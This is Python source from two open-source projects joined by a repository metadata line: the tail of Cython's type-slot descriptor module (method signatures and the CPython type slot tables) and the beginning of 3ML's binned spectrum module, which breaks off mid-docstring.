'r': PyrexTypes.c_returncode_type,
'B': PyrexTypes.c_py_buffer_ptr_type,
# 'T', '-' and '*' are handled otherwise
# and are not looked up in here
}
type_to_format_map = dict([(type_, format_)
for format_, type_ in format_map.iteritems()])
error_value_map = {
'O': "NULL",
'T': "NULL",
'i': "-1",
'b': "-1",
'l': "-1",
'r': "-1",
'h': "-1",
'z': "-1",
}
def __init__(self, arg_format, ret_format):
self.has_dummy_arg = 0
self.has_generic_args = 0
if arg_format[:1] == '-':
self.has_dummy_arg = 1
arg_format = arg_format[1:]
if arg_format[-1:] == '*':
self.has_generic_args = 1
arg_format = arg_format[:-1]
self.fixed_arg_format = arg_format
self.ret_format = ret_format
self.error_value = self.error_value_map.get(ret_format, None)
self.is_staticmethod = False
def num_fixed_args(self):
return len(self.fixed_arg_format)
def is_self_arg(self, i):
# argument is 'self' for methods or 'class' for classmethods
return self.fixed_arg_format[i] == 'T'
def returns_self_type(self):
# return type is same as 'self' argument type
return self.ret_format == 'T'
def fixed_arg_type(self, i):
return self.format_map[self.fixed_arg_format[i]]
def return_type(self):
return self.format_map[self.ret_format]
def format_from_type(self, arg_type):
if arg_type.is_pyobject:
arg_type = PyrexTypes.py_object_type
return self.type_to_format_map[arg_type]
def exception_value(self):
return self.error_value_map.get(self.ret_format)
def function_type(self, self_arg_override=None):
# Construct a C function type descriptor for this signature
args = []
for i in xrange(self.num_fixed_args()):
if self_arg_override is not None and self.is_self_arg(i):
assert isinstance(self_arg_override, PyrexTypes.CFuncTypeArg)
args.append(self_arg_override)
else:
arg_type = self.fixed_arg_type(i)
args.append(PyrexTypes.CFuncTypeArg("", arg_type, None))
if self_arg_override is not None and self.returns_self_type():
ret_type = self_arg_override.type
else:
ret_type = self.return_type()
exc_value = self.exception_value()
return PyrexTypes.CFuncType(ret_type, args, exception_value = exc_value)
def method_flags(self):
if self.ret_format == "O":
full_args = self.fixed_arg_format
if self.has_dummy_arg:
full_args = "O" + full_args
if full_args in ["O", "T"]:
if self.has_generic_args:
return [method_varargs, method_keywords]
else:
return [method_noargs]
elif full_args in ["OO", "TO"] and not self.has_generic_args:
return [method_onearg]
if self.is_staticmethod:
return [method_varargs, method_keywords]
return None
class SlotDescriptor(object):
# Abstract base class for type slot descriptors.
#
# slot_name string Member name of the slot in the type object
# is_initialised_dynamically Is initialised by code in the module init function
# py3 Indicates presence of slot in Python 3
# py2 Indicates presence of slot in Python 2
# ifdef Full #ifdef string that slot is wrapped in. Using this causes py3, py2 and flags to be ignored.)
def __init__(self, slot_name, dynamic=0,
py3=True, py2=True, ifdef=None):
self.slot_name = slot_name
self.is_initialised_dynamically = dynamic
self.ifdef = ifdef
self.py3 = py3
self.py2 = py2
def preprocessor_guard_code(self):
ifdef = self.ifdef
py2 = self.py2
py3 = self.py3
guard = None
if ifdef:
guard = ("#if %s" % ifdef)
elif not py3 or py3 == '<RESERVED>':
guard = ("#if PY_MAJOR_VERSION < 3")
elif not py2:
guard = ("#if PY_MAJOR_VERSION >= 3")
return guard
def generate(self, scope, code):
if self.is_initialised_dynamically:
value = 0
else:
value = self.slot_code(scope)
preprocessor_guard = self.preprocessor_guard_code()
if preprocessor_guard:
code.putln(preprocessor_guard)
code.putln("%s, /*%s*/" % (value, self.slot_name))
if self.py3 == '<RESERVED>':
code.putln("#else")
code.putln("0, /*reserved*/")
if preprocessor_guard:
code.putln("#endif")
# Some C implementations have trouble statically
# initialising a global with a pointer to an extern
# function, so we initialise some of the type slots
# in the module init function instead.
def generate_dynamic_init_code(self, scope, code):
if self.is_initialised_dynamically:
value = self.slot_code(scope)
if value != "0":
code.putln("%s.%s = %s;" % (
scope.parent_type.typeobj_cname,
self.slot_name,
value
)
)
class FixedSlot(SlotDescriptor):
# Descriptor for a type slot with a fixed value.
#
# value string
def __init__(self, slot_name, value, py3=True, py2=True, ifdef=None):
SlotDescriptor.__init__(self, slot_name, py3=py3, py2=py2, ifdef=ifdef)
self.value = value
def slot_code(self, scope):
return self.value
class EmptySlot(FixedSlot):
# Descriptor for a type slot whose value is always 0.
def __init__(self, slot_name, py3=True, py2=True, ifdef=None):
FixedSlot.__init__(self, slot_name, "0", py3=py3, py2=py2, ifdef=ifdef)
class MethodSlot(SlotDescriptor):
# Type slot descriptor for a user-definable method.
#
# signature Signature
# method_name string The __xxx__ name of the method
# alternatives [string] Alternative list of __xxx__ names for the method
def __init__(self, signature, slot_name, method_name, fallback=None,
py3=True, py2=True, ifdef=None):
SlotDescriptor.__init__(self, slot_name, py3=py3, py2=py2, ifdef=ifdef)
self.signature = signature
self.slot_name = slot_name
self.method_name = method_name
self.alternatives = []
method_name_to_slot[method_name] = self
#
if fallback:
self.alternatives.append(fallback)
for alt in (self.py2, self.py3):
if isinstance(alt, (tuple, list)):
slot_name, method_name = alt
self.alternatives.append(method_name)
method_name_to_slot[method_name] = self
def slot_code(self, scope):
entry = scope.lookup_here(self.method_name)
if entry and entry.func_cname:
return entry.func_cname
for method_name in self.alternatives:
entry = scope.lookup_here(method_name)
if entry and entry.func_cname:
return entry.func_cname
return "0"
class InternalMethodSlot(SlotDescriptor):
# Type slot descriptor for a method which is always
# synthesized by Cython.
#
# slot_name string Member name of the slot in the type object
def __init__(self, slot_name, **kargs):
SlotDescriptor.__init__(self, slot_name, **kargs)
def slot_code(self, scope):
return scope.mangle_internal(self.slot_name)
class GCDependentSlot(InternalMethodSlot):
# Descriptor for a slot whose value depends on whether
# the type participates in GC.
def __init__(self, slot_name, **kargs):
InternalMethodSlot.__init__(self, slot_name, **kargs)
def slot_code(self, scope):
if not scope.needs_gc():
return "0"
if not scope.has_pyobject_attrs:
# if the type does not have object attributes, it can
# delegate GC methods to its parent - iff the parent
# functions are defined in the same module
parent_type_scope = scope.parent_type.base_type.scope
if scope.parent_scope is parent_type_scope.parent_scope:
entry = scope.parent_scope.lookup_here(scope.parent_type.base_type.name)
if entry.visibility != 'extern':
return self.slot_code(parent_type_scope)
return InternalMethodSlot.slot_code(self, scope)
class ConstructorSlot(InternalMethodSlot):
# Descriptor for tp_new and tp_dealloc.
def __init__(self, slot_name, method, **kargs):
InternalMethodSlot.__init__(self, slot_name, **kargs)
self.method = method
def slot_code(self, scope):
if scope.parent_type.base_type \
and not scope.has_pyobject_attrs \
and not scope.lookup_here(self.method):
# if the type does not have object attributes, it can
# delegate GC methods to its parent - iff the parent
# functions are defined in the same module
parent_type_scope = scope.parent_type.base_type.scope
if scope.parent_scope is parent_type_scope.parent_scope:
entry = scope.parent_scope.lookup_here(scope.parent_type.base_type.name)
if entry.visibility != 'extern':
return self.slot_code(parent_type_scope)
return InternalMethodSlot.slot_code(self, scope)
class SyntheticSlot(InternalMethodSlot):
# Type slot descriptor for a synthesized method which
# dispatches to one or more user-defined methods depending
# on its arguments. If none of the relevant methods are
# defined, the method will not be synthesized and an
# alternative default value will be placed in the type
# slot.
def __init__(self, slot_name, user_methods, default_value, **kargs):
InternalMethodSlot.__init__(self, slot_name, **kargs)
self.user_methods = user_methods
self.default_value = default_value
def slot_code(self, scope):
if scope.defines_any(self.user_methods):
return InternalMethodSlot.slot_code(self, scope)
else:
return self.default_value
class TypeFlagsSlot(SlotDescriptor):
# Descriptor for the type flags slot.
def slot_code(self, scope):
value = "Py_TPFLAGS_DEFAULT|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER"
if not scope.parent_type.is_final_type:
value += "|Py_TPFLAGS_BASETYPE"
if scope.needs_gc():
value += "|Py_TPFLAGS_HAVE_GC"
return value
class DocStringSlot(SlotDescriptor):
# Descriptor for the docstring slot.
def slot_code(self, scope):
if scope.doc is not None:
if scope.doc.is_unicode:
doc = scope.doc.utf8encode()
else:
doc = scope.doc.byteencode()
return '__Pyx_DOCSTR("%s")' % StringEncoding.escape_byte_string(doc)
else:
return "0"
class SuiteSlot(SlotDescriptor):
# Descriptor for a substructure of the type object.
#
# sub_slots [SlotDescriptor]
def __init__(self, sub_slots, slot_type, slot_name):
SlotDescriptor.__init__(self, slot_name)
self.sub_slots = sub_slots
self.slot_type = slot_type
substructures.append(self)
def substructure_cname(self, scope):
return "%s%s_%s" % (Naming.pyrex_prefix, self.slot_name, scope.class_name)
def slot_code(self, scope):
return "&%s" % self.substructure_cname(scope)
def generate_substructure(self, scope, code):
code.putln("")
code.putln(
"static %s %s = {" % (
self.slot_type,
self.substructure_cname(scope)))
for slot in self.sub_slots:
slot.generate(scope, code)
code.putln("};")
substructures = [] # List of all SuiteSlot instances
class MethodTableSlot(SlotDescriptor):
# Slot descriptor for the method table.
def slot_code(self, scope):
return scope.method_table_cname
class MemberTableSlot(SlotDescriptor):
# Slot descriptor for the table of Python-accessible attributes.
def slot_code(self, scope):
return "0"
class GetSetSlot(SlotDescriptor):
# Slot descriptor for the table of attribute get & set methods.
def slot_code(self, scope):
if scope.property_entries:
return scope.getset_table_cname
else:
return "0"
class BaseClassSlot(SlotDescriptor):
# Slot descriptor for the base class slot.
def __init__(self, name):
SlotDescriptor.__init__(self, name, dynamic = 1)
def generate_dynamic_init_code(self, scope, code):
base_type = scope.parent_type.base_type
if base_type:
code.putln("%s.%s = %s;" % (
scope.parent_type.typeobj_cname,
self.slot_name,
base_type.typeptr_cname))
# The following dictionary maps __xxx__ method names to slot descriptors.
method_name_to_slot = {}
## The following slots are (or could be) initialised with an
## extern function pointer.
#
#slots_initialised_from_extern = (
# "tp_free",
#)
#------------------------------------------------------------------------------------------
#
# Utility functions for accessing slot table data structures
#
#------------------------------------------------------------------------------------------
def get_special_method_signature(name):
# Given a method name, if it is a special method,
# return its signature, else return None.
slot = method_name_to_slot.get(name)
if slot:
return slot.signature
else:
return None
def get_property_accessor_signature(name):
# Return signature of accessor for an extension type
# property, else None.
return property_accessor_signatures.get(name)
def get_base_slot_function(scope, slot):
# Returns the function implementing this slot in the baseclass.
# This is useful for enabling the compiler to optimize calls
# that recursively climb the class hierarchy.
base_type = scope.parent_type.base_type
if scope.parent_scope is base_type.scope.parent_scope:
parent_slot = slot.slot_code(base_type.scope)
if parent_slot != '0':
entry = scope.parent_scope.lookup_here(scope.parent_type.base_type.name)
if entry.visibility != 'extern':
return parent_slot
return None
#------------------------------------------------------------------------------------------
#
# Signatures for generic Python functions and methods.
#
#------------------------------------------------------------------------------------------
pyfunction_signature = Signature("-*", "O")
pymethod_signature = Signature("T*", "O")
#------------------------------------------------------------------------------------------
#
# Signatures for simple Python functions.
#
#------------------------------------------------------------------------------------------
pyfunction_noargs = Signature("-", "O")
pyfunction_onearg = Signature("-O", "O")
#------------------------------------------------------------------------------------------
#
# Signatures for the various kinds of function that
# can appear in the type object and its substructures.
#
#------------------------------------------------------------------------------------------
unaryfunc = Signature("T", "O") # typedef PyObject * (*unaryfunc)(PyObject *);
binaryfunc = Signature("OO", "O") # typedef PyObject * (*binaryfunc)(PyObject *, PyObject *);
ibinaryfunc = Signature("TO", "O") # typedef PyObject * (*binaryfunc)(PyObject *, PyObject *);
ternaryfunc = Signature("OOO", "O") # typedef PyObject * (*ternaryfunc)(PyObject *, PyObject *, PyObject *);
iternaryfunc = Signature("TOO", "O") # typedef PyObject * (*ternaryfunc)(PyObject *, PyObject *, PyObject *);
callfunc = Signature("T*", "O") # typedef PyObject * (*ternaryfunc)(PyObject *, PyObject *, PyObject *);
inquiry = Signature("T", "i") # typedef int (*inquiry)(PyObject *);
lenfunc = Signature("T", "z") # typedef Py_ssize_t (*lenfunc)(PyObject *);
# typedef int (*coercion)(PyObject **, PyObject **);
intargfunc = Signature("Ti", "O") # typedef PyObject *(*intargfunc)(PyObject *, int);
ssizeargfunc = Signature("Tz", "O") # typedef PyObject *(*ssizeargfunc)(PyObject *, Py_ssize_t);
intintargfunc = Signature("Tii", "O") # typedef PyObject *(*intintargfunc)(PyObject *, int, int);
ssizessizeargfunc = Signature("Tzz", "O") # typedef PyObject *(*ssizessizeargfunc)(PyObject *, Py_ssize_t, Py_ssize_t);
intobjargproc = Signature("TiO", 'r') # typedef int(*intobjargproc)(PyObject *, int, PyObject *);
ssizeobjargproc = Signature("TzO", 'r') # typedef int(*ssizeobjargproc)(PyObject *, Py_ssize_t, PyObject *);
intintobjargproc = Signature("TiiO", 'r') # typedef int(*intintobjargproc)(PyObject *, int, int, PyObject *);
ssizessizeobjargproc = Signature("TzzO", 'r') # typedef int(*ssizessizeobjargproc)(PyObject *, Py_ssize_t, Py_ssize_t, PyObject *);
intintargproc = Signature("Tii", 'r')
ssizessizeargproc = Signature("Tzz", 'r')
objargfunc = Signature("TO", "O")
objobjargproc = Signature("TOO", 'r') # typedef int (*objobjargproc)(PyObject *, PyObject *, PyObject *);
readbufferproc = Signature("TzP", "z") # typedef Py_ssize_t (*readbufferproc)(PyObject *, Py_ssize_t, void **);
writebufferproc = Signature("TzP", "z") # typedef Py_ssize_t (*writebufferproc)(PyObject *, Py_ssize_t, void **);
segcountproc = Signature("TZ", "z") # typedef Py_ssize_t (*segcountproc)(PyObject *, Py_ssize_t *);
charbufferproc = Signature("TzS", "z") # typedef Py_ssize_t (*charbufferproc)(PyObject *, Py_ssize_t, char **);
objargproc = Signature("TO", 'r') # typedef int (*objobjproc)(PyObject *, PyObject *);
# typedef int (*visitproc)(PyObject *, void *);
# typedef int (*traverseproc)(PyObject *, visitproc, void *);
destructor = Signature("T", "v") # typedef void (*destructor)(PyObject *);
# printfunc = Signature("TFi", 'r') # typedef int (*printfunc)(PyObject *, FILE *, int);
# typedef PyObject *(*getattrfunc)(PyObject *, char *);
getattrofunc = Signature("TO", "O") # typedef PyObject *(*getattrofunc)(PyObject *, PyObject *);
# typedef int (*setattrfunc)(PyObject *, char *, PyObject *);
setattrofunc = Signature("TOO", 'r') # typedef int (*setattrofunc)(PyObject *, PyObject *, PyObject *);
delattrofunc = Signature("TO", 'r')
cmpfunc = Signature("TO", "i") # typedef int (*cmpfunc)(PyObject *, PyObject *);
reprfunc = Signature("T", "O") # typedef PyObject *(*reprfunc)(PyObject *);
hashfunc = Signature("T", "h") # typedef Py_hash_t (*hashfunc)(PyObject *);
# typedef PyObject *(*richcmpfunc) (PyObject *, PyObject *, int);
richcmpfunc = Signature("OOi", "O") # typedef PyObject *(*richcmpfunc) (PyObject *, PyObject *, int);
getiterfunc = Signature("T", "O") # typedef PyObject *(*getiterfunc) (PyObject *);
iternextfunc = Signature("T", "O") # typedef PyObject *(*iternextfunc) (PyObject *);
descrgetfunc = Signature("TOO", "O") # typedef PyObject *(*descrgetfunc) (PyObject *, PyObject *, PyObject *);
descrsetfunc = Signature("TOO", 'r') # typedef int (*descrsetfunc) (PyObject *, PyObject *, PyObject *);
descrdelfunc = Signature("TO", 'r')
initproc = Signature("T*", 'r') # typedef int (*initproc)(PyObject *, PyObject *, PyObject *);
# typedef PyObject *(*newfunc)(struct _typeobject *, PyObject *, PyObject *);
# typedef PyObject *(*allocfunc)(struct _typeobject *, int);
getbufferproc = Signature("TBi", "r") # typedef int (*getbufferproc)(PyObject *, Py_buffer *, int);
releasebufferproc = Signature("TB", "v") # typedef void (*releasebufferproc)(PyObject *, Py_buffer *);
#------------------------------------------------------------------------------------------
#
# Signatures for accessor methods of properties.
#
#------------------------------------------------------------------------------------------
property_accessor_signatures = {
'__get__': Signature("T", "O"),
'__set__': Signature("TO", 'r'),
'__del__': Signature("T", 'r')
}
#------------------------------------------------------------------------------------------
#
# Descriptor tables for the slots of the various type object
# substructures, in the order they appear in the structure.
#
#------------------------------------------------------------------------------------------
PyNumberMethods = (
MethodSlot(binaryfunc, "nb_add", "__add__"),
MethodSlot(binaryfunc, "nb_subtract", "__sub__"),
MethodSlot(binaryfunc, "nb_multiply", "__mul__"),
MethodSlot(binaryfunc, "nb_divide", "__div__", py3 = False),
MethodSlot(binaryfunc, "nb_remainder", "__mod__"),
MethodSlot(binaryfunc, "nb_divmod", "__divmod__"),
MethodSlot(ternaryfunc, "nb_power", "__pow__"),
MethodSlot(unaryfunc, "nb_negative", "__neg__"),
MethodSlot(unaryfunc, "nb_positive", "__pos__"),
MethodSlot(unaryfunc, "nb_absolute", "__abs__"),
MethodSlot(inquiry, "nb_nonzero", "__nonzero__", py3 = ("nb_bool", "__bool__")),
MethodSlot(unaryfunc, "nb_invert", "__invert__"),
MethodSlot(binaryfunc, "nb_lshift", "__lshift__"),
MethodSlot(binaryfunc, "nb_rshift", "__rshift__"),
MethodSlot(binaryfunc, "nb_and", "__and__"),
MethodSlot(binaryfunc, "nb_xor", "__xor__"),
MethodSlot(binaryfunc, "nb_or", "__or__"),
EmptySlot("nb_coerce", py3 = False),
MethodSlot(unaryfunc, "nb_int", "__int__", fallback="__long__"),
MethodSlot(unaryfunc, "nb_long", "__long__", fallback="__int__", py3 = "<RESERVED>"),
MethodSlot(unaryfunc, "nb_float", "__float__"),
MethodSlot(unaryfunc, "nb_oct", "__oct__", py3 = False),
MethodSlot(unaryfunc, "nb_hex", "__hex__", py3 = False),
# Added in release 2.0
MethodSlot(ibinaryfunc, "nb_inplace_add", "__iadd__"),
MethodSlot(ibinaryfunc, "nb_inplace_subtract", "__isub__"),
MethodSlot(ibinaryfunc, "nb_inplace_multiply", "__imul__"),
MethodSlot(ibinaryfunc, "nb_inplace_divide", "__idiv__", py3 = False),
MethodSlot(ibinaryfunc, "nb_inplace_remainder", "__imod__"),
MethodSlot(ibinaryfunc, "nb_inplace_power", "__ipow__"), # actually ternaryfunc!!!
MethodSlot(ibinaryfunc, "nb_inplace_lshift", "__ilshift__"),
MethodSlot(ibinaryfunc, "nb_inplace_rshift", "__irshift__"),
MethodSlot(ibinaryfunc, "nb_inplace_and", "__iand__"),
MethodSlot(ibinaryfunc, "nb_inplace_xor", "__ixor__"),
MethodSlot(ibinaryfunc, "nb_inplace_or", "__ior__"),
# Added in release 2.2
# The following require the Py_TPFLAGS_HAVE_CLASS flag
MethodSlot(binaryfunc, "nb_floor_divide", "__floordiv__"),
MethodSlot(binaryfunc, "nb_true_divide", "__truediv__"),
MethodSlot(ibinaryfunc, "nb_inplace_floor_divide", "__ifloordiv__"),
MethodSlot(ibinaryfunc, "nb_inplace_true_divide", "__itruediv__"),
# Added in release 2.5
MethodSlot(unaryfunc, "nb_index", "__index__", ifdef = "PY_VERSION_HEX >= 0x02050000")
)
PySequenceMethods = (
MethodSlot(lenfunc, "sq_length", "__len__"),
EmptySlot("sq_concat"), # nb_add used instead
EmptySlot("sq_repeat"), # nb_multiply used instead
SyntheticSlot("sq_item", ["__getitem__"], "0"), #EmptySlot("sq_item"), # mp_subscript used instead
MethodSlot(ssizessizeargfunc, "sq_slice", "__getslice__"),
EmptySlot("sq_ass_item"), # mp_ass_subscript used instead
SyntheticSlot("sq_ass_slice", ["__setslice__", "__delslice__"], "0"),
MethodSlot(cmpfunc, "sq_contains", "__contains__"),
EmptySlot("sq_inplace_concat"), # nb_inplace_add used instead
EmptySlot("sq_inplace_repeat"), # nb_inplace_multiply used instead
)
PyMappingMethods = (
MethodSlot(lenfunc, "mp_length", "__len__"),
MethodSlot(objargfunc, "mp_subscript", "__getitem__"),
SyntheticSlot("mp_ass_subscript", ["__setitem__", "__delitem__"], "0"),
)
PyBufferProcs = (
MethodSlot(readbufferproc, "bf_getreadbuffer", "__getreadbuffer__", py3 = False),
MethodSlot(writebufferproc, "bf_getwritebuffer", "__getwritebuffer__", py3 = False),
MethodSlot(segcountproc, "bf_getsegcount", "__getsegcount__", py3 = False),
MethodSlot(charbufferproc, "bf_getcharbuffer", "__getcharbuffer__", py3 = False),
MethodSlot(getbufferproc, "bf_getbuffer", "__getbuffer__", ifdef = "PY_VERSION_HEX >= 0x02060000"),
MethodSlot(releasebufferproc, "bf_releasebuffer", "__releasebuffer__", ifdef = "PY_VERSION_HEX >= 0x02060000")
)
#------------------------------------------------------------------------------------------
#
# The main slot table. This table contains descriptors for all the
# top-level type slots, beginning with tp_dealloc, in the order they
# appear in the type object.
#
#------------------------------------------------------------------------------------------
slot_table = (
ConstructorSlot("tp_dealloc", '__dealloc__'),
EmptySlot("tp_print"), #MethodSlot(printfunc, "tp_print", "__print__"),
EmptySlot("tp_getattr"),
EmptySlot("tp_setattr"),
MethodSlot(cmpfunc, "tp_compare", "__cmp__", py3 = '<RESERVED>'),
MethodSlot(reprfunc, "tp_repr", "__repr__"),
SuiteSlot(PyNumberMethods, "PyNumberMethods", "tp_as_number"),
SuiteSlot(PySequenceMethods, "PySequenceMethods", "tp_as_sequence"),
SuiteSlot(PyMappingMethods, "PyMappingMethods", "tp_as_mapping"),
MethodSlot(hashfunc, "tp_hash", "__hash__"),
MethodSlot(callfunc, "tp_call", "__call__"),
MethodSlot(reprfunc, "tp_str", "__str__"),
SyntheticSlot("tp_getattro", ["__getattr__","__getattribute__"], "0"), #"PyObject_GenericGetAttr"),
SyntheticSlot("tp_setattro", ["__setattr__", "__delattr__"], "0"), #"PyObject_GenericSetAttr"),
SuiteSlot(PyBufferProcs, "PyBufferProcs", "tp_as_buffer"),
TypeFlagsSlot("tp_flags"),
DocStringSlot("tp_doc"),
GCDependentSlot("tp_traverse"),
GCDependentSlot("tp_clear"),
# Later -- synthesize a method to split into separate ops?
MethodSlot(richcmpfunc, "tp_richcompare", "__richcmp__"),
EmptySlot("tp_weaklistoffset"),
MethodSlot(getiterfunc, "tp_iter", "__iter__"),
MethodSlot(iternextfunc, "tp_iternext", "__next__"),
MethodTableSlot("tp_methods"),
MemberTableSlot("tp_members"),
GetSetSlot("tp_getset"),
BaseClassSlot("tp_base"), #EmptySlot("tp_base"),
EmptySlot("tp_dict"),
SyntheticSlot("tp_descr_get", ["__get__"], "0"),
SyntheticSlot("tp_descr_set", ["__set__", "__delete__"], "0"),
EmptySlot("tp_dictoffset"),
MethodSlot(initproc, "tp_init", "__init__"),
EmptySlot("tp_alloc"), #FixedSlot("tp_alloc", "PyType_GenericAlloc"),
InternalMethodSlot("tp_new"),
EmptySlot("tp_free"),
EmptySlot("tp_is_gc"),
EmptySlot("tp_bases"),
EmptySlot("tp_mro"),
EmptySlot("tp_cache"),
EmptySlot("tp_subclasses"),
EmptySlot("tp_weaklist"),
EmptySlot("tp_del"),
EmptySlot("tp_version_tag", ifdef="PY_VERSION_HEX >= 0x02060000"),
)
#------------------------------------------------------------------------------------------
#
# Descriptors for special methods which don't appear directly
# in the type object or its substructures. These methods are
# called from slot functions synthesized by Cython.
#
#------------------------------------------------------------------------------------------
MethodSlot(initproc, "", "__cinit__")
MethodSlot(destructor, "", "__dealloc__")
MethodSlot(objobjargproc, "", "__setitem__")
MethodSlot(objargproc, "", "__delitem__")
MethodSlot(ssizessizeobjargproc, "", "__setslice__")
MethodSlot(ssizessizeargproc, "", "__delslice__")
MethodSlot(getattrofunc, "", "__getattr__")
MethodSlot(setattrofunc, "", "__setattr__")
MethodSlot(delattrofunc, "", "__delattr__")
MethodSlot(descrgetfunc, "", "__get__")
MethodSlot(descrsetfunc, "", "__set__")
MethodSlot(descrdelfunc, "", "__delete__")
# Method flags for python-exposed methods.
method_noargs = "METH_NOARGS"
method_onearg = "METH_O"
method_varargs = "METH_VARARGS"
method_keywords = "METH_KEYWORDS"
method_coexist = "METH_COEXIST"
| apache-2.0 | 73,553,137,307,292,590 | 39.293734 | 133 | 0.573692 | false |
volodymyrss/3ML | threeML/plugins/spectrum/binned_spectrum.py | 1 | 20977 | import numpy as np
import pandas as pd
from threeML.utils.histogram import Histogram
from threeML.utils.interval import Interval, IntervalSet
from threeML.plugins.OGIP.response import InstrumentResponse
from threeML.utils.stats_tools import sqrt_sum_of_squares
class Channel(Interval):
@property
def channel_width(self):
return self._get_width()
class ChannelSet(IntervalSet):
INTERVAL_TYPE = Channel
@classmethod
def from_instrument_response(cls, instrument_response):
"""
Build EBOUNDS interval from an instrument response
:param instrument_response:
:return:
"""
new_ebounds = cls.from_list_of_edges(instrument_response.ebounds)
return new_ebounds
@property
def channels_widths(self):
return np.array([channel.channel_width for channel in self._intervals ])
class Quality(object):
def __init__(self, quality):
"""
simple class to formalize the quality flags used in spectra
:param quality: a quality array
"""
#total_length = len(quality)
n_elements = 1
for dim in quality.shape:
n_elements *= dim
good = quality == 'good'
warn = quality == 'warn'
bad = quality == 'bad'
assert n_elements == good.sum() + warn.sum() + bad.sum(), 'quality can only contain "good", "warn", and "bad"'
self._good = good
self._warn = warn
self._bad = bad
self._quality = quality
def __len__(self):
return len(self._quality)
def get_slice(self, idx):
return Quality(self._quality[idx,:])
@property
def good(self):
return self._good
@property
def warn(self):
return self._warn
@property
def bad(self):
return self._bad
@property
def n_elements(self):
return len(self._quality)
@classmethod
def from_ogip(cls, ogip_quality):
good = ogip_quality == 0
warn = ogip_quality == 2
bad = np.logical_and(~good, ~warn)
quality = np.empty_like(ogip_quality,dtype='|S4')
quality[:] = 'good'
# quality = np.array(['good' for i in xrange(len(ogip_quality))])
#quality[good] = 'good'
quality[warn] = 'warn'
quality[bad] = 'bad'
return cls(quality)
def to_ogip(self):
"""
makes a quality array following the OGIP standards:
0 = good
2 = warn
5 = bad
:return:
"""
ogip_quality = np.zeros(self._quality.shape,dtype=np.int32)
ogip_quality[self.warn] = 2
ogip_quality[self.bad] = 5
return ogip_quality
@classmethod
def create_all_good(cls, n_channels):
"""
construct a quality object with all good channels
:param n_channels:
:return:
"""
quality = np.array(['good' for i in xrange(int(n_channels))])
return cls(quality)
class BinnedSpectrum(Histogram):
INTERVAL_TYPE = Channel
def __init__(self, counts, exposure, ebounds, count_errors=None, sys_errors=None, quality=None, scale_factor=1.,
is_poisson=False, mission=None, instrument=None, tstart=None, tstop=None):
"""
A general binned histogram of either Poisson or non-Poisson rates. While the input is in counts, 3ML spectra work
in rates, so this class uses the exposure to construct the rates from the counts.
:param counts: an array of counts
:param exposure: the exposure for the counts
:param ebounds: the len(counts) + 1 energy edges of the histogram or an instance of EBOUNDSIntervalSet
:param count_errors: (optional) the count errors for the spectra
:param sys_errors: (optional) systematic errors on the spectrum
:param quality: quality instance marking good, bad and warned channels. If not provided, all channels are assumed to be good
:param scale_factor: scaling parameter of the spectrum
:param is_poisson: if the histogram is Poisson
:param mission: the mission name
:param instrument: the instrument name
"""
# attach the parameters ot the object
self._is_poisson = is_poisson
self._exposure = exposure
self._scale_factor = scale_factor
# if we do not have a ChannelSet,
if not isinstance(ebounds, ChannelSet):
# make one from the edges
ebounds = ChannelSet.from_list_of_edges(ebounds) #type: ChannelSet
if count_errors is not None:
assert not self._is_poisson, "Read count errors but spectrum marked Poisson"
# convert counts to rate
rate_errors = count_errors / self._exposure
else:
rate_errors = None
if sys_errors is None:
sys_errors = np.zeros_like(counts)
self._sys_errors = sys_errors
# convert rates to counts
rates = counts / self._exposure
if quality is not None:
# check that we are using the 3ML quality type
assert isinstance(quality, Quality)
self._quality = quality
else:
# if there is no quality, then assume all channels are good
self._quality = Quality.create_all_good(len(rates))
if mission is None:
self._mission = 'UNKNOWN'
else:
self._mission = mission
if instrument is None:
self._instrument = 'UNKNOWN'
else:
self._instrument = instrument
self._tstart = tstart
self._tstop = tstop
# pass up to the binned spectrum
super(BinnedSpectrum, self).__init__(list_of_intervals=ebounds,
contents=rates,
errors=rate_errors,
sys_errors=sys_errors,
is_poisson=is_poisson)
@property
def n_channel(self):
return len(self)
@property
def rates(self):
"""
:return: rates per channel
"""
return self._contents
@property
def total_rate(self):
"""
:return: total rate
"""
return self._contents.sum()
@property
def total_rate_error(self):
"""
:return: total rate error
"""
assert self.is_poisson == False, "Cannot request errors on rates for a Poisson spectrum"
return sqrt_sum_of_squares(self._errors)
@property
def counts(self):
"""
:return: counts per channel
"""
return self._contents * self.exposure
@property
def count_errors(self):
"""
:return: count error per channel
"""
#VS: impact of this change is unclear to me, it seems to make sense and the tests pass
if self.is_poisson:
return None
else:
return self._errors * self.exposure
@property
def total_count(self):
"""
:return: total counts
"""
return self.counts.sum()
@property
def total_count_error(self):
"""
:return: total count error
"""
#VS: impact of this change is unclear to me, it seems to make sense and the tests pass
if self.is_poisson:
return None
else:
return sqrt_sum_of_squares(self.count_errors)
@property
def tstart(self):
return self._tstart
@property
def tstop(self):
return self._tstop
@property
def is_poisson(self):
return self._is_poisson
@property
def rate_errors(self):
"""
If the spectrum has no Poisson error (POISSER is False in the header), this will return the STAT_ERR column
:return: errors on the rates
"""
if self.is_poisson:
return None
else:
return self._errors
@property
def n_channels(self):
return len(self)
@property
def sys_errors(self):
"""
Systematic errors per channel. This is nonzero only if the SYS_ERR column is present in the input file.
:return: the systematic errors stored in the input spectrum
"""
return self._sys_errors
@property
def exposure(self):
"""
Exposure in seconds
:return: exposure
"""
return self._exposure
@property
def quality(self):
return self._quality
@property
def scale_factor(self):
return self._scale_factor
@property
def mission(self):
return self._mission
@property
def instrument(self):
return self._instrument
def clone(self, new_counts=None, new_count_errors=None, new_exposure=None):
"""
make a new spectrum with new counts and errors and all other
parameters the same
:param new_counts: new counts for the spectrum
:param new_count_errors: new errors from the spectrum
:return:
"""
if new_counts is None:
new_counts = self.counts
new_count_errors = self.count_errors
if new_exposure is None:
new_exposure = self.exposure
return BinnedSpectrum(counts=new_counts,
ebounds=ChannelSet.from_list_of_edges(self.edges),
exposure=new_exposure,
count_errors=new_count_errors,
sys_errors=self._sys_errors,
quality=self._quality,
scale_factor=self._scale_factor,
is_poisson=self._is_poisson,
mission=self._mission,
instrument=self._instrument)
@classmethod
def from_pandas(cls,pandas_dataframe,exposure,scale_factor=1.,is_poisson=False,mission=None,instrument=None):
"""
Build a spectrum from data contained within a pandas data frame.
The required columns are:
'emin': low energy bin edge
'emax': high energy bin edge
'counts': the counts in each bin
Optional column names are:
'count_errors': errors on the counts for non-Poisson data
'sys_errors': systematic error per channel
'quality' list of 3ML quality flags 'good', 'warn', 'bad'
